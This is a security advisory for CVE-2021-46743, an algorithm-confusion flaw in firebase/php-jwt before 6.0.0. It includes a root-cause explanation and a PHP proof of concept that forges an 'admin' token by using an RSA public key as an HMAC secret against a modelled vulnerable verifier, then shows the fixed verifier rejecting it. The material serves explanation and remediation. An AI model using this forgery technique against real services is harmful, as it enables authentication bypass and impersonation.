
CVE-2021-46743:
Firebase PHP-JWT key/algorithm type confusion

CVSS Score: 9.1 (CVSS v3.1)

Basic Information

EPSS Score: 0.76202%
Published: 3/30/2022
Updated: 2/21/2023
KEV Status: No
Technology: PHP

Technical Details

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Package Name       Ecosystem   Vulnerable Versions   First Patched Version
firebase/php-jwt   composer    < 6.0.0               6.0.0

Vulnerability Intelligence

Miggo AI Root Cause Analysis

The vulnerability stems from how versions before 6.0.0 selected keys. When multiple keys were supplied to JWT::decode as an array (a key ring), the token's 'kid' (Key ID) header selected the key, but nothing bound that key to a particular algorithm: the algorithm came from the token's own 'alg' header and was checked only against the caller's list of allowed algorithms. A ring holding keys of different types (for example an RSA public key for RS256 and a shared secret for HS256) therefore permitted an algorithm-confusion attack: an attacker points 'kid' at the RSA entry, sets 'alg' to HS256, and computes the HMAC with the public key as the secret, producing a token that validates under the wrong key. JWT::decode was changed in v6.0.0 to require a Key object that binds key material to its algorithm, confirming this function as the focal point. GitHub issue #351 and the release notes explicitly reference this function's role in the vulnerability.
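The key-selection behaviour described above, as an added example in plain PHP. This is not php-jwt's own code: decode_keyring_legacy models the shape of the pre-6.0 JWT::decode($jwt, $keyOrKeyArray, $allowedAlgs), where the ring maps kid to raw key material and the token's alg header picks the algorithm, and decode_keyring_bound models the 6.0 shape, where each key carries its algorithm the way the Key object does. The function names, the kid values and the claims are illustrative, and the RSA key pair and HMAC secret are generated at runtime.

```php
<?php
// Added example, not php-jwt's code: a minimal key-ring verifier showing the
// pre-6.0 key/alg confusion and the 6.0-style fix. Requires ext-openssl.
declare(strict_types=1);

function b64url(string $bin): string {
    return rtrim(strtr(base64_encode($bin), '+/', '-_'), '=');
}
function b64url_decode(string $s): string {
    return base64_decode(strtr($s, '-_', '+/') . str_repeat('=', (4 - strlen($s) % 4) % 4));
}

// Build a signed token. $key is an HMAC secret for HS256 or an OpenSSL private key for RS256.
function make_token(array $header, array $claims, $key): string {
    $signingInput = b64url(json_encode($header)) . '.' . b64url(json_encode($claims));
    if ($header['alg'] === 'HS256') {
        $sig = hash_hmac('sha256', $signingInput, $key, true);
    } elseif ($header['alg'] === 'RS256') {
        openssl_sign($signingInput, $sig, $key, OPENSSL_ALGO_SHA256);
    } else {
        throw new InvalidArgumentException('unsupported alg');
    }
    return $signingInput . '.' . b64url($sig);
}

// Check a signature with a given algorithm and key material.
function verify_sig(string $alg, string $signingInput, string $sig, $key): bool {
    if ($alg === 'HS256') {
        return hash_equals(hash_hmac('sha256', $signingInput, $key, true), $sig);
    }
    if ($alg === 'RS256') {
        return openssl_verify($signingInput, $sig, $key, OPENSSL_ALGO_SHA256) === 1;
    }
    return false;
}

// VULNERABLE (models php-jwt < 6.0.0): the ring maps kid => raw key material and the
// token's own 'alg' header chooses the algorithm, limited only by $allowedAlgs.
// Any allowed algorithm may therefore be applied to any key in the ring.
function decode_keyring_legacy(string $jwt, array $keyring, array $allowedAlgs): ?array {
    [$h, $c, $s] = explode('.', $jwt);
    $header = json_decode(b64url_decode($h), true);
    if (!in_array($header['alg'] ?? '', $allowedAlgs, true)) return null;
    if (!isset($header['kid'], $keyring[$header['kid']])) return null;
    $key = $keyring[$header['kid']];               // selected by kid alone
    return verify_sig($header['alg'], "$h.$c", b64url_decode($s), $key)
        ? json_decode(b64url_decode($c), true) : null;
}

// FIXED (models php-jwt 6.0.0's Key object): each kid maps to [material, alg].
// The algorithm is a property of the key; the token's 'alg' must match it.
function decode_keyring_bound(string $jwt, array $keyring): ?array {
    [$h, $c, $s] = explode('.', $jwt);
    $header = json_decode(b64url_decode($h), true);
    if (!isset($header['kid'], $keyring[$header['kid']])) return null;
    [$key, $alg] = $keyring[$header['kid']];
    if (($header['alg'] ?? '') !== $alg) return null;
    return verify_sig($alg, "$h.$c", b64url_decode($s), $key)
        ? json_decode(b64url_decode($c), true) : null;
}

// Constructed keys for the demo, generated at runtime.
$priv = openssl_pkey_new(['private_key_bits' => 2048, 'private_key_type' => OPENSSL_KEYTYPE_RSA]);
$pubPem = openssl_pkey_get_details($priv)['key'];
$hmacSecret = random_bytes(32);

// Legacy ring: two key types, no algorithm binding.
$legacyRing = ['svc-hmac' => $hmacSecret, 'idp-rsa' => $pubPem];

// Forgery: the attacker knows the public key, points kid at the RSA entry, declares
// HS256 and uses the PEM text as the HMAC secret. No private key is involved.
$forged = make_token(['alg' => 'HS256', 'typ' => 'JWT', 'kid' => 'idp-rsa'], ['sub' => 'admin'], $pubPem);
var_dump(decode_keyring_legacy($forged, $legacyRing, ['RS256', 'HS256']));

// Bound ring: the RSA entry can only ever be verified with RS256.
$boundRing = ['svc-hmac' => [$hmacSecret, 'HS256'], 'idp-rsa' => [$pubPem, 'RS256']];
var_dump(decode_keyring_bound($forged, $boundRing));

// A token genuinely signed with the private key still validates under the bound ring.
$good = make_token(['alg' => 'RS256', 'typ' => 'JWT', 'kid' => 'idp-rsa'], ['sub' => 'alice'], $priv);
var_dump(decode_keyring_bound($good, $boundRing));
```

Run with `php example.php`. The first var_dump shows the legacy verifier accepting the forged `sub: admin` token, because the allowed-algorithm list was shared across the whole ring and the RSA public key was simply fed to HMAC-SHA256. The second shows the bound verifier rejecting the same token, and the third shows a properly RS256-signed token still being accepted. The practical check when upgrading is that every key passed to JWT::decode is wrapped in a Key with its algorithm, and that no caller still passes a plain string or array alongside a list of allowed algorithms.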

